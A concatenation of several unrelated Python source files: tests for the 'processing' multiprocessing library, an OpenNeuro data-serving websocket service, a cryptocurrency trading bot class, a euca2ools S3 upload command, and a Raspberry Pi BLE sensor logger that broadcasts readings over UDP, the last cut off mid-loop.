if self.TYPE == 'processes':
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, reader.send, 2)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
conn.sendBytes('hello')
self.assertEqual(conn.recvBytes(), 'hello')
conn.sendBytes('')
conn.close()
p.join()
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _test(self, address):
conn = self.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.setDaemon(True)
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
if not self.connection.connections_are_picklable:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = 'This connection uses family %s' % fam
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = 'This connection uses a normal socket'
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = processing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = processing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
#
#
#
class _Foo(ctypes.Structure):
_fields_ = [
('x', ctypes.c_int),
('y', ctypes.c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _double(self, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
from processing.sharedctypes import Value, Array
x = Value('i', 7, lock=lock)
y = Value(ctypes.c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = Array('d', range(10), lock=lock)
string = Array('c', 20, lock=lock)
string.value = 'hello'
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, 'hellohello')
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
from processing.sharedctypes import Value, copy
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _test_finalize(self, conn):
from processing.finalize import Finalize
from processing.process import _exitFunction
class Foo(object):
pass
a = Foo()
Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
Finalize(c, conn.send, args=('c',))
d10 = Foo()
Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
Finalize(d03, conn.send, args=('d03',), exitpriority=0)
Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call processing's cleanup function then exit process without
# garbage collecting locals
_exitFunction()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = (
'processing', 'processing.connection',
'processing.finalize', 'processing.forking',
'processing.heap', 'processing.logger',
'processing.managers', 'processing.pool',
'processing.process', 'processing.reduction',
'processing.sharedctypes', 'processing.synchronize'
)
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
processing.enableLogging(level=processing.SUBWARNING)
logger = processing.getLogger()
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
def _test_level(self, conn):
logger = processing.getLogger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
LEVEL3 = 41
reader, writer = processing.Pipe(duplex=False)
root_logger = logging.getLogger('')
processing.enableLogging(level=LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
processing.getLogger().setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
self.assertEqual(processing.NOTSET, logging.NOTSET)
processing.enableLogging(level=logging.NOTSET)
root_logger.setLevel(LEVEL3)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL3, reader.recv())
processing.enableLogging(level=processing.SUBWARNING)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type[0].upper() + type[1:]
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = processing.Process
locals().update(get_attributes(processing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array',
'currentProcess', 'activeChildren', 'Pipe', 'connection'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = processing.Process
manager = object.__new__(processing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', '_debugInfo'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = processing.dummy.Process
locals().update(get_attributes(processing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'currentProcess',
'activeChildren', 'Pipe', 'connection', 'dict', 'list',
'Namespace'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
#
#
#
def test_main(run=None):
if run is None:
from test.test_support import run_suite as run
ProcessesMixin.pool = processing.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__)
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
run(suite)
ManagerMixin.manager.shutdown()
ProcessesMixin.pool.terminate()
del ProcessesMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
openNeuroService.py
|
"""
A command-line service to be run where the where OpenNeuro data is downloaded and cached.
This service instantiates a BidsInterface object for serving the data back to the client
running in the cloud. It connects to the remote projectServer.
Once a connection is established it waits for requets and invokes the BidsInterface
functions to handle them.
"""
import os
import logging
import threading
from rtCommon.bidsInterface import BidsInterface
from rtCommon.wsRemoteService import WsRemoteService, parseConnectionArgs
from rtCommon.utils import installLoggers
class OpenNeuroService:
"""
A class that implements the OpenNeuroService by instantiating a BidsInterface, connecting
to the remote projectServer and servicing requests to the BidsInterface.
"""
def __init__(self, args, webSocketChannelName='wsData'):
"""
Uses the WsRemoteService framework to parse connection-related args and establish
a connection to a remote projectServer. Instantiates a local version of BidsInterface
to handle client requests coming from the projectServer connection.
Args:
args: Argparse args related to connecting to the remote server. These include
"-s <server>", "-u <username>", "-p <password>", "--test",
"-i <retry-connection-interval>"
webSocketChannelName: The websocket url extension used to connecy and communicate
to the remote projectServer, e.g. 'wsData' would connect to 'ws://server:port/wsData'
"""
self.bidsInterface = BidsInterface(dataRemote=False)
self.wsRemoteService = WsRemoteService(args, webSocketChannelName)
self.wsRemoteService.addHandlerClass(BidsInterface, self.bidsInterface)
def runDetached(self):
"""Starts the receiver in it's own thread."""
self.recvThread = threading.Thread(name='recvThread',
target=self.wsRemoteService.runForever)
self.recvThread.setDaemon(True)
self.recvThread.start()
if __name__ == "__main__":
installLoggers(logging.INFO, logging.INFO, filename='logs/OpenNeuroService.log')
# parse connection args
connectionArgs = parseConnectionArgs()
try:
openNeuroService = OpenNeuroService(connectionArgs)
# Use this command to run the service and not return control
openNeuroService.wsRemoteService.runForever()
# Alternately use this command to start the service in a thread and
# return control to main.
# openNeuroService.runDetached()
except Exception as err:
print(f'Exception: {err}')
|
bot.py
|
import os,sys,logging,time,json,datetime,random,numpy
from trader import Trader
from marketanalyzer import Analyzer
from botdata import BotDataProvider
from tcpsock import TcpSock
from bittrex import Bittrex
from scraper import Scraper
from tradewallet import TradeWallet
from mongowrapper import MongoWrapper
from threading import Thread
class Bot(object):
def __init__(self, name, config,settings=None):
self.log = logging.getLogger('crypto')
self.config = config
self.name = name
# self.budget = config.get("budget",0)
# self.initial_budget = self.budget
# self.tradelimit = config.get("tradelimit",0)
self.market = config.get("market",None)
self.exchange = config.get("exchange","bittrex")
self.candlesize = config.get("candlesize","5m")
self.timeframe = config.get("timeframe","3d")
self.basesize = config.get("basesize","1m")
self.stopped = False
if not self.market:
raise Exception("missing required fields market: {}".format(self.market))
if "usdt" in self.market.lower():
self.scale = config.get("scale",2)
else:
self.scale = config.get("scale",8)
# sync wallet with database ?
self.syncWallet = config.get("syncWallet",False)
#candlestick data
self.csdata = None
self.market_summary = None
self.last = None
self.scrapeDate = None
self.startDate = None
#dataprovider for candlestick data
self.trader = Trader(market=self.market,exchange=self.exchange)
#manage indicators
self.analyzer = None
#tcp socket
self.tcpsock = None
# signal details
self.history = []
# bot signals
self.signals = None
#cached api results
self.apiInfo = {}
#bot settings
self.defaults = None
self.setDefaults()
self.settings = self.updateSettings(settings)
#threadHandler
self.thread = None
self.botSleep = 15
self.ticks = 0
self.eticks = 0
self.rticks = 0
self.refresh_high = None
self.refresh_low = None
self.candle_remaining = None
wname = "sim:{}:{}".format(self.name,self.market)
self.simwallet = TradeWallet({'market':self.market,'name':wname,'sync':False,'scale':self.scale})
wname = "{}:{}".format(self.name,self.market)
self.wallet = TradeWallet({'market':self.market,'name':wname,'mode':'live','sync':self.syncWallet,'scale':self.scale})
if self.syncWallet:
self.wallet.load()
self.wallet.notify("Traderbot {}: {} started".format(self.name,self.market))
def configure(self, config ):
self.config = {
"market": "",
"candlesize": "5m",
"budget": 0.01,
"maxtrades": 5,
"target": 0.05,
"stop": 0.025,
"notify": ""
}
self.config = { **self.config, **config }
def setDefaults(self):
self.defaults = {
"rsi.buy": 35,
"rsi.sell": 65,
"baseMinDistance": 0.04,
"baseMultiplier": 10,
"short.sma.period": 50,
"long.sma.period": 200,
"sma.bear.score": -25,
"sma.bull.score": 5,
"death.cross": -100,
"golden.cross": 20,
"dband.top": -15,
"dband.bottom": 15,
"bband.below": 5,
"bband.above": -15,
"bband.enter.bottom": 10,
}
def updateSettings(self,override = None):
if override != None:
self.settings = {**self.defaults,**override}
else:
self.settings = self.defaults
return self.settings
def score( self, score, csdataIndex, message ):
self.history.append({
'candle': self.csdata['time'][csdataIndex],
"score": score,
"message": message
})
return score
def getInfo(self, query=None):
if query in self.apiInfo:
return self.apiInfo[query]
elif query == "stop":
self.stopped = True
return json.dumps({ "message": "bot stopped" })
def getSignals(self,idx):
return { 'signal': None, 'score': 0, 'messages': self.history }
def buildOutput(self):
self.apiInfo["help"] = json.dumps({ "message": "no help here buddy" })
def processRunner(self):
while not self.stopped:
try:
self.process()
self.ticks += 1
except Exception as ex:
print("Error: {}".format(ex))
self.eticks += 1
#raise ex
# print(".",end=" ")
time.sleep(self.botSleep)
def start(self):
self.startDate = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')
self.thread = Thread(target=self.processRunner)
self.thread.start()
def stop(self):
self.thread.join()
def isStopped(self):
return self.stopped
def process(self, options = {}):
return None
def refresh(self, scrape=False):
# print("market={},exchange={}".format(self.market, self.exchange))
scraper = Scraper({'market': self.market, 'exchange': self.exchange})
self.candle_remaining = self.trader.getCandleRemaining()
if self.candle_remaining is None:
csdata = None
if scrape:
try:
if self.candlesize == "1d" or self.candlesize == "1h":
cs = self.candlesize
else:
cs = "1m"
# print('scraping:{}'.format(cs))
csdata = scraper.cc_scrapeCandle(cs)
self.scrapeDate = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')
self.rticks += 1
except Exception as ex:
print(ex)
if self.candlesize not in ("1m","1d","1h"):
csdata = None
self.loadCandlesticks(csdata)
try:
if self.exchange == "bittrex":
self.market_summary = Bittrex().public_get_market_summary(self.market).data["result"][0]
else:
last = scraper.cc_lastprice()
self.market_summary = {"Last": last,"Ask":0,"Bid":0}
except Exception as ex:
self.market_summary = {"Last": self.csdata["closed"][-1],"Ask":0,"Bid":0}
self.last = self.market_summary['Last']
self.csdata['closed'][-1] = self.last
if self.candle_remaining is not None:
if self.last > self.refresh_high:
self.refresh_high == self.last
if self.last < self.refresh_low:
self.refresh_low = self.last
else:
self.refresh_high = self.csdata["high"][-1]
self.refresh_low = self.csdata["low"][-1]
#self.candle_remaining = self.trader.candle_remaining
self.csdata["high"][-1] = self.refresh_high
self.csdata["low"][-1] = self.refresh_low
self.calculate_ta()
def lastidx(self):
return len(self.csdata['closed']) - 1
def calculate_ta(self):
self.tadata = {}
def createSocket( self, ip="127.0.0.1", port=9500 ):
self.tcpsock = TcpSock(ip,port, self)
self.tcpsock.start()
def closeSocket(self):
self.tcpsock.close()
def candleColor(self, idx ):
if self.csdata['closed'][idx] >= self.csdata['open'][idx]:
return 'green'
else:
return 'red'
def candle(self, idx, ta = None ):
candle = {
"date": self.csdata["time"][idx],
"open": self.csdata["open"][idx],
"high": self.csdata["high"][idx],
"low": self.csdata["low"][idx],
"close": self.csdata["closed"][idx],
"volume": self.csdata["volume"][idx],
"basevolume": self.csdata["basevolume"][idx]
}
if ta is not None:
for name in self.tadata:
if not numpy.isnan(self.tadata[name][idx]):
candle.update({name : self.tadata[name][idx]})
return candle
def getAnalyzer():
return self.analyzer
def getMarket(self):
return self.market
def getName(self):
return self.name
def getIndicators(self):
return self.indicators
def loadCandlesticks(self,csdata=None):
if csdata == None:
self.csdata = self.trader.get_candlesticks(self.timeframe,size=self.candlesize,base_size=self.basesize)
else:
self.csdata = csdata
self.analyzer = Analyzer( self.csdata )
|
putobject.py
|
# Copyright 2013-2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import hashlib
import socket
import sys
import threading
import time
from requestbuilder import Arg
from requestbuilder.exceptions import ArgumentError, ClientError
from requestbuilder.mixins import FileTransferProgressBarMixin
from euca2ools.commands.s3 import S3Request
import euca2ools.util
class PutObject(S3Request, FileTransferProgressBarMixin):
DESCRIPTION = ('Upload an object to the server\n\nNote that uploading a '
'large file to a region other than the one the bucket is '
'may result in "Broken pipe" errors or other connection '
'problems that this program cannot detect.')
ARGS = [Arg('source', metavar='FILE', route_to=None,
help='file to upload (required)'),
Arg('dest', metavar='BUCKET/KEY', route_to=None,
help='bucket and key name to upload the object to (required)'),
Arg('--size', type=int, route_to=None, help='''the number of
bytes to upload (required when reading from stdin)'''),
Arg('--acl', route_to=None, choices=(
'private', 'public-read', 'public-read-write',
'authenticated-read', 'bucket-owner-read',
'bucket-owner-full-control', 'aws-exec-read')),
Arg('--mime-type', route_to=None,
help='MIME type for the file being uploaded'),
Arg('--retry', dest='retries', action='store_const', const=5,
default=0, route_to=None,
help='retry interrupted uploads up to 5 times'),
Arg('--progressbar-label', help=argparse.SUPPRESS)]
METHOD = 'PUT'
def __init__(self, **kwargs):
S3Request.__init__(self, **kwargs)
self.last_upload_error = None
self._lock = threading.Lock()
# noinspection PyExceptionInherit
def configure(self):
S3Request.configure(self)
if self.args['source'] == '-':
if self.args.get('size') is None:
raise ArgumentError(
"argument --size is required when uploading stdin")
source = _FileObjectExtent(sys.stdin, self.args['size'])
elif isinstance(self.args['source'], basestring):
source = _FileObjectExtent.from_filename(
self.args['source'], size=self.args.get('size'))
else:
if self.args.get('size') is None:
raise ArgumentError(
"argument --size is required when uploading a file object")
source = _FileObjectExtent(self.args['source'], self.args['size'])
self.args['source'] = source
bucket, _, key = self.args['dest'].partition('/')
if not bucket:
raise ArgumentError('destination bucket name must be non-empty')
if not key:
raise ArgumentError('destination key name must be non-empty')
def preprocess(self):
self.path = self.args['dest']
if self.args.get('acl'):
self.headers['x-amz-acl'] = self.args['acl']
if self.args.get('mime_type'):
self.headers['Content-Type'] = self.args['mime_type']
# noinspection PyExceptionInherit
def main(self):
self.preprocess()
source = self.args['source']
self.headers['Content-Length'] = source.size
# We do the upload in another thread so the main thread can show a
# progress bar.
upload_thread = threading.Thread(
target=self.try_send, args=(source,),
kwargs={'retries_left': self.args.get('retries') or 0})
# The upload thread is daemonic so ^C will kill the program more
# cleanly.
upload_thread.daemon = True
upload_thread.start()
pbar_label = self.args.get('progressbar_label') or source.filename
pbar = self.get_progressbar(label=pbar_label, maxval=source.size)
pbar.start()
while upload_thread.is_alive():
pbar.update(source.tell())
time.sleep(0.05)
pbar.finish()
upload_thread.join()
source.close()
with self._lock:
if self.last_upload_error is not None:
# pylint: disable=E0702
raise self.last_upload_error
# pylint: enable=E0702
def try_send(self, source, retries_left=0):
self.body = source
if retries_left > 0 and not source.can_rewind:
self.log.warn('source cannot rewind, so requested retries will '
'not be attempted')
retries_left = 0
try:
response = self.send()
our_md5 = source.read_hexdigest
their_md5 = response.headers['ETag'].lower().strip('"')
if their_md5 != our_md5:
self.log.error('corrupt upload (our MD5: %s, their MD5: %s',
our_md5, their_md5)
raise ClientError('upload was corrupted during transit')
except ClientError as err:
if len(err.args) > 0 and isinstance(err.args[0], socket.error):
self.log.warn('socket error')
if retries_left > 0:
self.log.info('retrying upload (%i retries remaining)',
retries_left)
source.rewind()
return self.try_send(source, retries_left - 1)
with self._lock:
self.last_upload_error = err
raise
except Exception as err:
with self._lock:
self.last_upload_error = err
raise
class _FileObjectExtent(object):
# By rights this class should be iterable, but if we do that then requests
# will attempt to use chunked transfer-encoding, which S3 does not
# support.
def __init__(self, fileobj, size, filename=None):
self.closed = False
self.filename = filename
self.fileobj = fileobj
self.size = size
self.__bytes_read = 0
self.__md5 = hashlib.md5()
if hasattr(self.fileobj, 'tell'):
self.__initial_pos = self.fileobj.tell()
else:
self.__initial_pos = None
def __len__(self):
return self.size
@classmethod
def from_filename(cls, filename, size=None):
if size is None:
size = euca2ools.util.get_filesize(filename)
return cls(open(filename), size, filename=filename)
@property
def can_rewind(self):
return hasattr(self.fileobj, 'seek') and self.__initial_pos is not None
def close(self):
self.fileobj.close()
self.closed = True
def next(self):
remaining = self.size - self.__bytes_read
if remaining <= 0:
raise StopIteration()
chunk = self.fileobj.next() # might raise StopIteration, which is good
chunk = chunk[:remaining] # throw away data that are off the end
self.__bytes_read += len(chunk)
self.__md5.update(chunk)
return chunk
def read(self, size=-1):
remaining = self.size - self.__bytes_read
if size < 0:
chunk_len = remaining
else:
chunk_len = min(remaining, size)
chunk = self.fileobj.read(chunk_len)
self.__bytes_read += len(chunk)
self.__md5.update(chunk)
return chunk
@property
def read_hexdigest(self):
return self.__md5.hexdigest()
def rewind(self):
if not hasattr(self.fileobj, 'seek'):
raise TypeError('file object is not seekable')
assert self.__initial_pos is not None
self.fileobj.seek(self.__initial_pos)
self.__bytes_read = 0
self.__md5 = hashlib.md5()
def tell(self):
return self.__bytes_read
|
ble_logger_SensorMedal2_udp_tx.py
|
#!/usr/bin/env python3
# coding: utf-8
################################################################################
# BLE Logger for Rohm SensorMedal-EVK-002 [UDPデータ送信機能付き]
# Raspberry Piを使って、センサメダルのセンサ情報を表示します。
#
# Copyright (c) 2019 Wataru KUNINO
################################################################################
#【インストール方法】
# bluepy (Bluetooth LE interface for Python)をインストールしてください
# sudo pip3 install bluepy
#
# pip3 がインストールされていない場合は、先に下記を実行
# sudo apt-get update
# sudo apt-get install python-pip libglib2.0-dev
#
#【実行方法】
# 実行するときは sudoを付与してください(動作表示あり)
# sudo ./ble_logger_SensorMedal2_udp_tx.py &
#
# 継続的にバックグラウンドで実行する場合(動作表示なし)
# sudo nohup ./ble_logger_SensorMedal2_udp_tx.py >& /dev/null &
#
#【参考文献】
# 本プログラムを作成するにあたり下記を参考にしました
# https://www.rohm.co.jp/documents/11401/3946483/sensormedal-evk-002_ug-j.pdf
# https://ianharvey.github.io/bluepy-doc/scanner.html
interval = 3 # 動作間隔
udp_to = '255.255.255.255' # UDPブロードキャスト
udp_port = 1024 # UDPポート番号
device_s = 'medal' # デバイス識別名(5文字)
device_n = '3' # デバイス識別番号(1桁)
from bluepy import btle
from sys import argv
import getpass
from time import sleep
import socket
import threading
mutex = False
def payval(num, bytes=1, sign=False):
global val
a = 0
for i in range(0, bytes):
a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)
if sign:
if a >= 2 ** (bytes * 8 - 1):
a -= 2 ** (bytes * 8)
return a
def send_udp(s):
global mutex # グローバル変数mutexを取得
mutex.acquire() # mutex状態に設定(排他処理開始)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # ソケット作成
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST,1) # ソケット設定
print(threading.current_thread().name,'send :', s) # 受信データを出力
udp_bytes = (s + '\n').encode() # バイト列に変換
try: # 作成部
sock.sendto(udp_bytes,(udp_to,udp_port)) # UDPブロードキャスト送信
except Exception as e: # 例外処理発生時
print(e) # エラー内容を表示
sock.close() # ソケットの切断
sleep(0.5) # 送信完了待ち
mutex.release() # mutex状態の開放
argc = len(argv) # 引数の数をargcへ代入
if argc >= 2: # 入力パラメータ数の確認
udp_port = argv[1] # ポート番号を設定
if udp_port < 1 or udp_port > 65535: # ポート1未満or65535超の時
udp_port = 1024 # UDPポート番号を1024に
scanner = btle.Scanner()
sensors = dict()
mutex = threading.Lock() # 排他処理用のオブジェクト生成
while True:
# BLE受信処理
try:
devices = scanner.scan(interval)
except Exception as e:
print("ERROR",e)
if getpass.getuser() != 'root':
print('使用方法: sudo', argv[0])
exit()
sleep(interval)
continue
# 受信データについてBLEデバイス毎の処理
for dev in devices:
print("\nDevice %s (%s), RSSI=%d dB" % (dev.addr,dev.addrType,dev.rssi))
isRohmMedal = False
for (adtype, desc, val) in dev.getScanData():
print(" %s = %s" % (desc, val))
if desc == 'Short Local Name' and val[0:10] == 'ROHMMedal2':
isRohmMedal = True
if isRohmMedal and desc == 'Manufacturer':
# センサ値を辞書型変数sensorsへ代入
sensors['ID'] = hex(payval(2,2))
sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536
sensors['Humidity'] = 100 * payval(6,2) / 65536
sensors['SEQ'] = payval(8)
sensors['Condition Flags'] = bin(int(val[16:18],16))
sensors['Accelerometer X'] = payval(10,2,True) / 4096
sensors['Accelerometer Y'] = payval(12,2,True) / 4096
sensors['Accelerometer Z'] = payval(14,2,True) / 4096
sensors['Accelerometer'] = (sensors['Accelerometer X'] ** 2\
+ sensors['Accelerometer Y'] ** 2\
+ sensors['Accelerometer Z'] ** 2) ** 0.5
sensors['Geomagnetic X'] = payval(16,2,True) / 10
sensors['Geomagnetic Y'] = payval(18,2,True) / 10
sensors['Geomagnetic Z'] = payval(20,2,True) / 10
sensors['Geomagnetic'] = (sensors['Geomagnetic X'] ** 2\
+ sensors['Geomagnetic Y'] ** 2\
+ sensors['Geomagnetic Z'] ** 2) ** 0.5
sensors['Pressure'] = payval(22,3) / 2048
sensors['Illuminance'] = payval(25,2) / 1.2
sensors['Magnetic'] = hex(payval(27))
sensors['Steps'] = payval(28,2)
sensors['Battery Level'] = payval(30)
sensors['RSSI'] = dev.rssi
# 画面へ表示
print(' ID =',sensors['ID'])
print(' SEQ =',sensors['SEQ'])
print(' Temperature =',round(sensors['Temperature'],2),'℃')
print(' Humidity =',round(sensors['Humidity'],2),'%')
print(' Pressure =',round(sensors['Pressure'],3),'hPa')
print(' Illuminance =',round(sensors['Illuminance'],1),'lx')
print(' Accelerometer =',round(sensors['Accelerometer'],3),'g (',\
round(sensors['Accelerometer X'],3),\
round(sensors['Accelerometer Y'],3),\
round(sensors['Accelerometer Z'],3),'g)')
print(' Geomagnetic =',round(sensors['Geomagnetic'],1),'uT (',\
round(sensors['Geomagnetic X'],1),\
round(sensors['Geomagnetic Y'],1),\
round(sensors['Geomagnetic Z'],1),'uT)')
print(' Magnetic =',sensors['Magnetic'])
print(' Steps =',sensors['Steps'],'歩')
print(' Battery Level =',sensors['Battery Level'],'%')
# 照度センサ
s = 'illum_' + device_n[0]
s += ',' + str(round(sensors['Illuminance'],0))
thread = threading.Thread(target=send_udp, args=([s]))
thread.start()
# 環境センサ
s = 'envir_' + device_n[0]
s += ',' + str(round(sensors['Temperature'],1))
s += ',' + str(round(sensors['Humidity'],0))
s += ',' + str(round(sensors['Pressure'],0))
thread = threading.Thread(target=send_udp, args=([s]))
thread.start()
# 加速度センサ
s = 'accem_' + device_n[0]
s += ',' + str(round(sensors['Accelerometer X'],0))
s += ',' + str(round(sensors['Accelerometer Y'],0))
s += ',' + str(round(sensors['Accelerometer Z'],0))
thread = threading.Thread(target=send_udp, args=([s]))
thread.start()
# センサメダル
s = device_s[0:5] + '_' + device_n[0]
s += ',' + str(round(sensors['Accelerometer'],0))
s += ',' + str(round(sensors['Geomagnetic'],0))
s += ',' + str(int(sensors['Magnetic'],16))
